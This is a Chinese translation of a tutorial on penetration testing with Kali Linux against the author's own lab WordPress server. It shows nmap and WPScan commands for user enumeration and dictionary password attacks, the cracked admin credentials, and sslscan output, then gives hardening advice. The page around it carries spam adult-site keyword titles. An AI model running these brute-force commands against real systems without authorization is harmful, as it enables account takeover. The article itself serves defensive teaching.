激情久久久_欧美视频区_成人av免费_不卡视频一二三区_欧美精品在欧美一区二区少妇_欧美一区二区三区的

服務器之家:專注于服務器技術及軟件下載分享
分類導航

Linux|Centos|Ubuntu|系統(tǒng)進程|Fedora|注冊表|Bios|Solaris|Windows7|Windows10|Windows11|windows server|

香港云服务器
服務器之家 - 服務器系統(tǒng) - Linux - 使用 Linux 安全工具進行滲透測試

使用 Linux 安全工具進行滲透測試

2021-08-05 23:17Linux中國Peter Gervase Linux

眾多被廣泛報道的大型消費企業(yè)入侵事件凸顯了系統(tǒng)安全管理的重要性。幸運的是,有許多不同的應用程序可以幫助保護計算機系統(tǒng)。其中一個是 Kali,一個為安全和滲透測試而開發(fā)的 Linux 發(fā)行版。本文演示了如何使用 Kali Linux 來

使用 Linux 安全工具進行滲透測試

使用 Kali Linux 和其他開源工具來發(fā)現(xiàn)系統(tǒng)中的安全漏洞和弱點。

眾多被廣泛報道的大型消費企業(yè)入侵事件凸顯了系統(tǒng)安全管理的重要性。幸運的是,有許多不同的應用程序可以幫助保護計算機系統(tǒng)。其中一個是 Kali,一個為安全和滲透測試而開發(fā)的 Linux 發(fā)行版。本文演示了如何使用 Kali Linux 來審視你的系統(tǒng)以發(fā)現(xiàn)弱點。

Kali 安裝了很多工具,它們都是開源的,默認情況下安裝了它們會讓事情變得更容易。

(LCTT 譯注:Kali 及其攜帶工具只應該用于對自己擁有合法審查權利的系統(tǒng)和設備,任何未經(jīng)授權的掃描、滲透和攻擊均是違法的。本文作者、譯者均不承擔任何非授權使用的結果。)

使用 Linux 安全工具進行滲透測試

Kali's tools

本文使用的系統(tǒng)是:

  1. kali.usersts.redhat.com:這是我將用來啟動掃描和攻擊的系統(tǒng)。它擁有 30GB 內(nèi)存和 6 個虛擬 CPU(vCPU)。
  2. vulnerable.usersys.redhat.com: 這是一個 Red Hat 企業(yè)版 Linux 8 系統(tǒng),它會成為目標。它擁有 16GB 內(nèi)存和 6 個 vCPU。它是一個相對較新的系統(tǒng),但有些軟件包可能已經(jīng)過時。
  3. 這個系統(tǒng)包括 httpd-2.4.37-30.module+el8.3.0+7001+0766b9e7.x86_64、 mariadb-server-10.3.27-3.module+el8.3.0+8972+5e3224e9.x86_64、 tigervnc-server-1.9.0-15.el8_1.x86_64、 vsftpd-3.0.3-32.el8.x86_64 和一個 5.6.1 版本的 WordPress。

我在上面列出了硬件規(guī)格,因為一些任務要求很高,尤其是在運行 WordPress 安全掃描程序(WPScan)時對目標系統(tǒng) CPU 的要求。

探測你的系統(tǒng)

 

首先,我會在目標系統(tǒng)上進行基本的 Nmap 掃描(你可以閱讀 使用 Nmap 結果幫助加固 Linux 系統(tǒng) 一文來更深入地了解 Nmap)。Nmap 掃描是一種快速的方法,可以大致了解被測系統(tǒng)中哪些端口和服務是暴露的。

使用 Linux 安全工具進行滲透測試

Nmap scan

默認掃描顯示有幾個你可能感興趣的開放端口。實際上,任何開放端口都可能成為攻擊者破壞你網(wǎng)絡的一種方式。在本例中,端口 21、22、80 和 443 是不錯的掃描對象,因為它們是常用服務的端口。在這個早期階段,我只是在做偵察工作,盡可能多地獲取有關目標系統(tǒng)的信息。

我想用 Nmap 偵察 80 端口,所以我使用 -p 80 參數(shù)來查看端口 80,-A 參數(shù)來獲取操作系統(tǒng)和應用程序版本等信息。

使用 Linux 安全工具進行滲透測試

Nmap scan of port 80

關鍵信息有:

  1. PORT   STATE SERVICE VERSION
  2. 80/tcp open  http       Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
  3. |_http-generator: WordPress 5.6.1

現(xiàn)在我知道了這是一個 WordPress 服務器,我可以使用 WPScan 來獲取有關潛在威脅的信息。一個很好的偵察方法是嘗試找到一些用戶名,使用 --enumerate u 告訴 WPScan 在 WordPress 實例中查找用戶名。例如:

  1. ┌──(rootkali)-[~]
  2. └─# wpscan --url vulnerable.usersys.redhat.com --enumerate u
  3. _______________________________________________________________
  4. __ _______ _____
  5. \ \ / / __ \ / ____|
  6. \ \ /\ / /| |__) | (___ ___ __ _ _ __
  7. \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
  8. \ /\ / | | ____) | (__| (_| | | | |
  9. \/ \/ |_| |_____/ \___|\__,_|_| |_|
  10.  
  11. WordPress Security Scanner by the WPScan Team
  12. Version 3.8.10
  13. Sponsored by Automattic - https://automattic.com/
  14. @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
  15. _______________________________________________________________
  16.  
  17. [+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]
  18. [+] Started: Tue Feb 16 21:38:49 2021
  19.  
  20. Interesting Finding(s):
  21. ...
  22. [i] User(s) Identified:
  23.  
  24. [+] admin
  25. | Found By: Author Posts - Display Name (Passive Detection)
  26. | Confirmed By:
  27. | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  28. | Login Error Messages (Aggressive Detection)
  29.  
  30. [+] pgervase
  31. | Found By: Author Posts - Display Name (Passive Detection)
  32. | Confirmed By:
  33. | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  34. | Login Error Messages (Aggressive Detection)

這顯示有兩個用戶:admin 和 pgervase。我將嘗試使用密碼字典來猜測 admin 的密碼。密碼字典是一個包含很多密碼的文本文件。我使用的字典大小有 37G,有 3,543,076,137 行。

就像你可以選擇不同的文本編輯器、Web 瀏覽器和其他應用程序 一樣,也有很多工具可以啟動密碼攻擊。下面是兩個使用 Nmap 和 WPScan 的示例命令:

  1. # nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=/path/to/passworddb,threads=6 vulnerable.usersys.redhat.com
  1. # wpscan --url vulnerable.usersys.redhat.com --passwords /path/to/passworddb --usernames admin --max-threads 50 | tee nmap.txt

這個 Nmap 腳本是我使用的許多腳本之一,使用 WPScan 掃描 URL 只是這個工具可以完成的許多任務之一。你可以用你喜歡的那一個。

WPScan 示例在文件末尾顯示了密碼:

  1. ┌──(rootkali)-[~]
  2. └─# wpscan --url vulnerable.usersys.redhat.com --passwords passwords.txt --usernames admin
  3. _______________________________________________________________
  4. __ _______ _____
  5. \ \ / / __ \ / ____|
  6. \ \ /\ / /| |__) | (___ ___ __ _ _ __ 
  7. \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
  8. \ /\ / | | ____) | (__| (_| | | | |
  9. \/ \/ |_| |_____/ \___|\__,_|_| |_|
  10.  
  11. WordPress Security Scanner by the WPScan Team
  12. Version 3.8.10
  13. Sponsored by Automattic - https://automattic.com/
  14. @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
  15. _______________________________________________________________
  16.  
  17. [+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]
  18. [+] Started: Thu Feb 18 20:32:13 2021
  19.  
  20. Interesting Finding(s):
  21.  
  22. ......
  23.  
  24. [+] Performing password attack on Wp Login against 1 user/s
  25. Trying admin / redhat Time: 00:01:57 <==================================================================================================================> (3231 / 3231) 100.00% Time: 00:01:57
  26. Trying admin / redhat Time: 00:01:57 <========================================================= > (3231 / 6462) 50.00% ETA: ??:??:??
  27. [SUCCESS] - admin / redhat
  28.  
  29. [!] Valid Combinations Found:
  30. | Username: admin, Password: redhat
  31.  
  32. [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
  33. [!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
  34.  
  35. [+] Finished: Thu Feb 18 20:34:15 2021
  36. [+] Requests Done: 3255
  37. [+] Cached Requests: 34
  38. [+] Data Sent: 1.066 MB
  39. [+] Data Received: 24.513 MB
  40. [+] Memory used: 264.023 MB
  41. [+] Elapsed time: 00:02:02

在末尾的“找到有效組合”部分包含了管理員用戶名和密碼,3231 行只用了兩分鐘。

我還有另一個字典文件,其中包含 3,238,659,984 行,使用它花費的時間更長并且會留下更多的證據(jù)。

使用 Nmap 可以更快地產(chǎn)生結果:

  1. ┌──(rootkali)-[~]
  2. └─# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=password.txt,threads=6 vulnerable.usersys.redhat.com
  3. Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-18 20:48 EST
  4. Nmap scan report for vulnerable.usersys.redhat.com (10.19.47.242)
  5. Host is up (0.00015s latency).
  6. Not shown: 995 closed ports
  7. PORT STATE SERVICE VERSION
  8. 21/tcp open ftp vsftpd 3.0.3
  9. 22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
  10. 80/tcp open http Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
  11. |_http-server-header: Apache/2.4.37 (Red Hat Enterprise Linux)
  12. | http-wordpress-brute:
  13. | Accounts:
  14. | admin:redhat - Valid credentials <<<<<<<
  15. | pgervase:redhat - Valid credentials <<<<<<<
  16. |_ Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0
  17. 111/tcp open rpcbind 2-4 (RPC #100000)
  18. | rpcinfo:
  19. | program version port/proto service
  20. | 100000 2,3,4 111/tcp rpcbind
  21. | 100000 2,3,4 111/udp rpcbind
  22. | 100000 3,4 111/tcp6 rpcbind
  23. |_ 100000 3,4 111/udp6 rpcbind
  24. 3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB
  25. MAC Address: 52:54:00:8C:A1:C0 (QEMU virtual NIC)
  26. Service Info: OS: Unix
  27.  
  28. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  29. Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds

然而,運行這樣的掃描可能會在目標系統(tǒng)上留下大量的 HTTPD 日志消息:

  1. 10.19.47.170 - - [18/Feb/2021:20:14:01 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
  2. 10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
  3. 10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
  4. 10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
  5. 10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
  6. 10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
  7. 10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
  8. 10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
  9. 10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
  10.  

為了獲得關于在最初的 Nmap 掃描中發(fā)現(xiàn)的 HTTPS 服務器的信息,我使用了 sslscan 命令:

  1. ┌──(rootkali)-[~]
  2. └─# sslscan vulnerable.usersys.redhat.com
  3. Version: 2.0.6-static
  4. OpenSSL 1.1.1i-dev xx XXX xxxx
  5.  
  6. Connected to 10.19.47.242
  7.  
  8. Testing SSL server vulnerable.usersys.redhat.com on port 443 using SNI name vulnerable.usersys.redhat.com
  9.  
  10. SSL/TLS Protocols:
  11. SSLv2 disabled
  12. SSLv3 disabled
  13. TLSv1.0 disabled
  14. TLSv1.1 disabled
  15. TLSv1.2 enabled
  16. TLSv1.3 enabled
  17. <snip>

它顯示了有關啟用的 SSL 協(xié)議的信息,在最下方,是關于 Heartbleed 漏洞的信息:

  1.   Heartbleed:
  2. TLSv1.3 not vulnerable to heartbleed
  3. TLSv1.2 not vulnerable to heartbleed

防御或減輕攻擊的技巧

 

有很多方法可以保護你的系統(tǒng)免受大量攻擊。幾個關鍵點是:

  • **了解你的系統(tǒng):**包括了解哪些端口是開放的,哪些端口應該開放,誰應該能夠看到這些開放的端口,以及使用這些端口服務的預期流量是多少。Nmap 是了解網(wǎng)絡系統(tǒng)的一個絕佳工具。
  • 使用當前的最佳實踐: 現(xiàn)在的最佳實踐可能不是未來的最佳實踐。作為管理員,了解信息安全領域的最新趨勢非常重要。
  • 知道如何使用你的產(chǎn)品: 例如,與其讓攻擊者不斷攻擊你的 WordPress 系統(tǒng),不如阻止他們的 IP 地址并限制嘗試登錄的次數(shù)。在現(xiàn)實世界中,阻止 IP 地址可能沒有那么有用,因為攻擊者可能會使用受感染的系統(tǒng)來發(fā)起攻擊。但是,這是一個很容易啟用的設置,可以阻止一些攻擊。
  • 維護和驗證良好的備份: 如果攻擊者攻擊了一個或多個系統(tǒng),能從已知的良好和干凈的備份中重新構建可以節(jié)省大量時間和金錢。
  • 檢查日志: 如上所示,掃描和滲透命令可能會留下大量日志,這表明攻擊者正在攻擊系統(tǒng)。如果你注意到它們,可以采取先發(fā)制人的行動來降低風險。
  • 更新系統(tǒng)、應用程序和任何額外的模塊: 正如 NIST Special Publication 800-40r3 所解釋的那樣,“補丁通常是減輕軟件缺陷漏洞最有效的方法,而且通常是唯一完全有效的解決方案。”
  • 使用供應商提供的工具: 供應商有不同的工具來幫助你維護他們的系統(tǒng),因此一定要充分利用它們。例如,紅帽企業(yè) Linux 訂閱中包含的 Red Hat Insights 可以幫助你優(yōu)化系統(tǒng)并提醒你注意潛在的安全威脅。

了解更多

 

本文對安全工具及其使用方法的介紹只是冰山一角。深入了解的話,你可能需要查看以下資源:

  • Armitage,一個開源的攻擊管理工具
  • Red Hat 產(chǎn)品安全中心
  • Red Hat 安全頻道
  • NIST 網(wǎng)絡安全頁面
  • 使用 Nmap 結果來幫助加固 Linux 系統(tǒng)

原文鏈接:https://linux.cn/article-13650-1.html

延伸 · 閱讀

精彩推薦
600
主站蜘蛛池模板: 日韩一级成人 | 久久国产亚洲精品 | 羞羞视频免费网站入口 | 污黄视频在线观看 | 国产成人综合在线 | 97zyz成人免费视频 | 天天干天天透 | 亚洲国产精品一区二区久久 | 在线播放亚洲视频 | 日韩毛片免费观看 | 久久新网址 | sesee99| 日本黄色大片免费 | 国内精品伊人久久久久网站 | 婷婷一区二区三区 | 狠狠干五月| 久色porn| 久久久一区二区三区视频 | 国产一区二区国产 | 中文字幕国 | 国产精品视频yy9299一区 | 欧美日韩国产中文字幕 | 成人在线免费视频播放 | 黄网站在线播放视频免费观看 | 国产男女爽爽爽爽爽免费视频 | 色诱亚洲精品久久久久久 | 国产精品久久久久久久久久久久久久久久 | 91国内精品久久久久免费影院 | 午夜男人在线观看 | 久久亚洲第一 | 免费a级毛片大学生免费观看 | 国产免费高清在线视频 | 色女生影院| 在线播放黄色网址 | 亚洲91在线 | 污污黄| 久久精品中文字幕 | 2019天天干夜夜操 | 成人在线视频精品 | 日本不卡二区 | 成人乱码一区二区三区不卡视频 |